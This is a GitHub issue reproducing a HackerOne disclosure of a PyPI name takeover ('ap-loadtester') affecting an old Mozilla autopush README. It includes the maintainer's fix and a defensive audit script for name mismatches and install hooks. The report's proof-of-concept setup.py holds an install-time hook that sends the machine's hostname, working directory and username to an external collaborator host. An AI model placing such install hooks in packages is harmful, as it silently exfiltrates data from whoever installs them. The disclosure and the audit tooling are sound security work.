mozilla-services / autopush-rs

Push Server in Rust
Mozilla Public License 2.0

code injection through pip #418

Open data-sync-user opened 11 months ago

data-sync-user commented 11 months ago

HackerOne Report: https://hackerone.com/reports/2097694 Report Date: 2023-08-05 17:06:15 UTC Reporter: anupamas01 Weakness: Code Injection

Initial Report: {panel}

Summary:

Hello team, I found a pip package by which I can run malicious commands.

Steps To Reproduce:

  1. Go to https://github.com/mozilla-services/autopush-loadtester (as it is highly used, I have not uploaded a higher version which may affect production).
  2. You can see `$ pip install ap-loadtester`; you can see I have taken it over on https://pypi.org/project/ap-loadtester/ (in Maintainers). When you install it, it will install my pip package.

POC

https://pypi.org/project/ap-loadtester/

(Right now I am not uploading any code; if the program allows, I will upload.)

```python
from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os


class CustomInstall(install):
    # Runs at `pip install` time (sdist build), after the normal install step.
    def run(self):
        install.run(self)
        hostname = socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        ploads = {'hostname': hostname, 'cwd': cwd, 'username': username}
        # replace burpcollaborator.net with Interactsh or pipedream
        requests.get("https://burpcollaborator.net", params=ploads)


setup(name='ap-loadtester',  # package name
      version='1.0.0',
      description='test',
      author='test',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})
```

Impact

code injection through the pip package

thanks AnupamAs01



{panel}

┆Issue is synchronized with this [Jira Bug](https://mozilla-hub.atlassian.net/browse/SYNC-3860)
┆Attachments: [F2576644] image.png (https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617)
jrconlin commented 11 months ago

Thank you for reporting this!

The repo you cite, autopush-loadtester, is a very old test script for the original autopush repo, which has been replaced by this repo. It was never meant to be installed by pip (and clearly so, because the setup.py would have created a differently named repo anyway. 🤦🏻‍♂️)
I've corrected the README on the autopush-loadtester repo to remove references to ap-loadtester, as well as archived the repo.

Clearly, there are a lot of old bits and pieces lying around that have not yet been cleaned up properly. Thank you for helping us find one.
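The two comments above describe the same gap from two sides: the README advertised `pip install ap-loadtester`, the repository's setup.py published a different name, so the advertised name sat unclaimed on PyPI until the reporter registered it with an install hook. The script below is an added example, not code from the report or from the autopush projects, that audits a repository for exactly that: it extracts the names a README tells users to install, compares them with the `name=` passed to `setup()`, and flags `cmdclass` overrides of the install step. The README and setup.py it reads are constructed samples that mirror the mismatch described here, and the function and file names are my own; nothing contacts PyPI unless `pypi_project_exists()` is called explicitly.

```python
"""Audit helper (added example): does the name a README tells users to
`pip install` match the name setup.py publishes, and does setup.py hook
the install command (the trick the PoC relies on)?

SAMPLE_README and SAMPLE_SETUP_PY are constructed, not the real
autopush-loadtester files."""
import ast
import re

SAMPLE_README = """\
# autopush-loadtester

Install with:

    $ pip install ap-loadtester

Then run the load test.
"""

# Constructed: declares a different name than the README advertises and
# overrides the `install` command, the same shape as the PoC setup.py.
SAMPLE_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install

class CustomInstall(install):
    def run(self):
        install.run(self)

setup(name='aplt', version='1.0.0',
      cmdclass={'install': CustomInstall})
"""

# `pip install [flags] <name>`; the lookahead stops before version
# specifiers and extras, and URLs (git+https://...) or paths never match.
PIP_INSTALL_RE = re.compile(
    r"\bpip3?\s+install\s+(?:-[-\w]+\s+)*"
    r"([A-Za-z0-9][A-Za-z0-9._-]*)(?=[\s\[=<>!~;,]|$)")


def normalize(name):
    """PEP 503 normalisation so Foo_Bar, foo.bar and foo-bar compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def advertised_names(readme_text):
    """Distribution names a README tells users to install."""
    names = set()
    for m in PIP_INSTALL_RE.finditer(readme_text):
        # `pip install -r file` names a requirements file, not a project.
        if re.search(r"\s(-r|-c|--requirement|--constraint)\s", m.group(0)):
            continue
        names.add(normalize(m.group(1)))
    return names


def _setup_calls(source):
    """Yield every setup(...) / setuptools.setup(...) call in the source."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            f = node.func
            callee = f.id if isinstance(f, ast.Name) else getattr(f, "attr", None)
            if callee == "setup":
                yield node


def declared_name(setup_py_source):
    """The normalised `name=` literal passed to setup(), or None."""
    for call in _setup_calls(setup_py_source):
        for kw in call.keywords:
            if kw.arg == "name" and isinstance(kw.value, ast.Constant) \
                    and isinstance(kw.value.value, str):
                return normalize(kw.value.value)
    return None


def install_hooks(setup_py_source):
    """Commands overridden via cmdclass=. A custom 'install' (or 'develop',
    'egg_info') is code that runs at `pip install` time from an sdist."""
    hooks = []
    for call in _setup_calls(setup_py_source):
        for kw in call.keywords:
            if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                hooks += [k.value for k in kw.value.keys
                          if isinstance(k, ast.Constant)]
    return hooks


def audit(readme_text, setup_py_source):
    """Names the README advertises that this repo does not build are
    takeover candidates; confirm on PyPI whether someone else owns them."""
    advertised = advertised_names(readme_text)
    declared = declared_name(setup_py_source)
    owned = {declared} if declared else set()
    return {
        "advertised": sorted(advertised),
        "declared": declared,
        "name_mismatch": sorted(advertised - owned),
        "install_hooks": install_hooks(setup_py_source),
    }


def pypi_project_exists(name):
    """Online follow-up (not called by the offline sample): True if PyPI
    serves https://pypi.org/pypi/<name>/json, False on 404."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(
                f"https://pypi.org/pypi/{normalize(name)}/json", timeout=10):
            return True
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise


if __name__ == "__main__":
    print(audit(SAMPLE_README, SAMPLE_SETUP_PY))
```

Run on the samples, `name_mismatch` comes back as `['ap-loadtester']` with `declared` as `'aplt'` and `install_hooks` as `['install']`: the advertised name is one the project never publishes, which is the condition under which anyone can register it, and the setup.py has the install-time hook the PoC uses. Each mismatch is worth confirming against PyPI (`pypi_project_exists`, or `pip index versions <name>`). Installing with `pip install --only-binary=:all:` never executes setup.py and so defeats the hook itself, but a wheel can still ship code that runs on first import, so that narrows the risk rather than removing it; the durable fix is the one the maintainer applied, which is to stop advertising a name the project does not own.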